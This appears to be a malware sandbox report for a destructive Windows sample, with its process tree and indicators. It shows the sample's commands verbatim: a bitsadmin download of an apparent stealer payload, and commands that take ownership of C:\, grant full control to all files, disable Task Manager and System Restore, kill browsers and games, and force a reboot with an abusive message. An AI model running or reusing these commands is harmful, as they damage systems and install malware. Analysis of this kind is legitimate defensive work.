Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.jar	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.m4v\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ibq	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cod	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2828	takeown.exe
Token: 33	1276	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1276	AUDIODG.EXE
Token: 33	1276	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1276	AUDIODG.EXE
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeShutdownPrivilege	2852	shutdown.exe
Token: SeRemoteShutdownPrivilege	2852	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 1820	2196	test.exe	30
PID 2196 wrote to memory of 1820	2196	test.exe	30
PID 2196 wrote to memory of 1820	2196	test.exe	30
PID 1820 wrote to memory of 2764	1820	cmd.exe	32
PID 1820 wrote to memory of 2764	1820	cmd.exe	32
PID 1820 wrote to memory of 2764	1820	cmd.exe	32
PID 1820 wrote to memory of 2828	1820	cmd.exe	33
PID 1820 wrote to memory of 2828	1820	cmd.exe	33
PID 1820 wrote to memory of 2828	1820	cmd.exe	33
PID 1820 wrote to memory of 2796	1820	cmd.exe	34
PID 1820 wrote to memory of 2796	1820	cmd.exe	34
PID 1820 wrote to memory of 2796	1820	cmd.exe	34
PID 1820 wrote to memory of 2736	1820	cmd.exe	35
PID 1820 wrote to memory of 2736	1820	cmd.exe	35
PID 1820 wrote to memory of 2736	1820	cmd.exe	35
PID 1820 wrote to memory of 2560	1820	cmd.exe	36
PID 1820 wrote to memory of 2560	1820	cmd.exe	36
PID 1820 wrote to memory of 2560	1820	cmd.exe	36
PID 1820 wrote to memory of 308	1820	cmd.exe	37
PID 1820 wrote to memory of 308	1820	cmd.exe	37
PID 1820 wrote to memory of 308	1820	cmd.exe	37
PID 1820 wrote to memory of 1088	1820	cmd.exe	38
PID 1820 wrote to memory of 1088	1820	cmd.exe	38
PID 1820 wrote to memory of 1088	1820	cmd.exe	38
PID 1820 wrote to memory of 2464	1820	cmd.exe	39
PID 1820 wrote to memory of 2464	1820	cmd.exe	39
PID 1820 wrote to memory of 2464	1820	cmd.exe	39
PID 1820 wrote to memory of 2492	1820	cmd.exe	40
PID 1820 wrote to memory of 2492	1820	cmd.exe	40
PID 1820 wrote to memory of 2492	1820	cmd.exe	40
PID 1820 wrote to memory of 2956	1820	cmd.exe	41
PID 1820 wrote to memory of 2956	1820	cmd.exe	41
PID 1820 wrote to memory of 2956	1820	cmd.exe	41
PID 1820 wrote to memory of 640	1820	cmd.exe	42
PID 1820 wrote to memory of 640	1820	cmd.exe	42
PID 1820 wrote to memory of 640	1820	cmd.exe	42
PID 1820 wrote to memory of 1336	1820	cmd.exe	45
PID 1820 wrote to memory of 1336	1820	cmd.exe	45
PID 1820 wrote to memory of 1336	1820	cmd.exe	45
PID 1820 wrote to memory of 1064	1820	cmd.exe	47
PID 1820 wrote to memory of 1064	1820	cmd.exe	47
PID 1820 wrote to memory of 1064	1820	cmd.exe	47
PID 1820 wrote to memory of 2348	1820	cmd.exe	48
PID 1820 wrote to memory of 2348	1820	cmd.exe	48
PID 1820 wrote to memory of 2348	1820	cmd.exe	48
PID 1820 wrote to memory of 2004	1820	cmd.exe	49
PID 1820 wrote to memory of 2004	1820	cmd.exe	49
PID 1820 wrote to memory of 2004	1820	cmd.exe	49
PID 1820 wrote to memory of 2276	1820	cmd.exe	50
PID 1820 wrote to memory of 2276	1820	cmd.exe	50
PID 1820 wrote to memory of 2276	1820	cmd.exe	50
PID 1820 wrote to memory of 2096	1820	cmd.exe	51
PID 1820 wrote to memory of 2096	1820	cmd.exe	51
PID 1820 wrote to memory of 2096	1820	cmd.exe	51
PID 1820 wrote to memory of 2684	1820	cmd.exe	52
PID 1820 wrote to memory of 2684	1820	cmd.exe	52
PID 1820 wrote to memory of 2684	1820	cmd.exe	52
PID 1820 wrote to memory of 2152	1820	cmd.exe	84
PID 1820 wrote to memory of 2152	1820	cmd.exe	84
PID 1820 wrote to memory of 2152	1820	cmd.exe	84
PID 1820 wrote to memory of 2832	1820	cmd.exe	54
PID 1820 wrote to memory of 2832	1820	cmd.exe	54
PID 1820 wrote to memory of 2832	1820	cmd.exe	54
PID 1820 wrote to memory of 2868	1820	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\560C.tmp\560D.tmp\560E.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Drops startup file
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    3⤵
    - Download via BitsAdmin
    PID:2764
- - C:\Windows\system32\takeown.exe
    takeown /f C:\*.*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2828
- - C:\Windows\system32\icacls.exe
    Icacls C:\*.* /C /G Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2796
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2736
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2560
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13774.vbs"
    3⤵
    PID:308
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31961.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:1088
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:2464
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2492
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24311.vbs"
    3⤵
    PID:2956
- - C:\Windows\system32\timeout.exe
    timeout 14
    3⤵
    - Delays execution with timeout.exe
    PID:640
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hl2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM javaw.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM RobloxPlayerBeta.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM GenshinImpact.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2276
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Among Us.exe
    3⤵
    - Kills process with taskkill
    PID:2096
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2832
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3028
- - C:\Windows\system32\shutdown.exe
    shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1128.vbs"
    3⤵
    - Blocklisted process makes network request
    - Enumerates connected drives
    - Modifies system certificate store
    PID:2552
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7083.vbs"
    3⤵
    - Enumerates connected drives
    PID:2628
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22018.vbs"
    3⤵
    PID:1852
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8678.vbs" 30706.bat
    3⤵
    PID:1144
  - - C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\30706.bat" "
      4⤵
      PID:592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1864
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2300
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1744
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:988
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1580
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2824
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2152
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2788
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1388
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1936
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:760
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1208
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2260
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1800
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2200
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1896
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2128
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2192
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2916
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2100
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2024
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2348
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:876
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2368
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2496
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2320
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2868
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2852
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2968
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2720
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2668
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:936
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1104
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:848
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2156
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1020
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2928
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1052
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1604
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:640
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1864
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2036
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2480
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2348
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2508
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2812
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2796
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1156
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2428
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2568
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2596
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2620
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:332
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1700
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2236
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:764
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2448
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2336
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2124
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2892
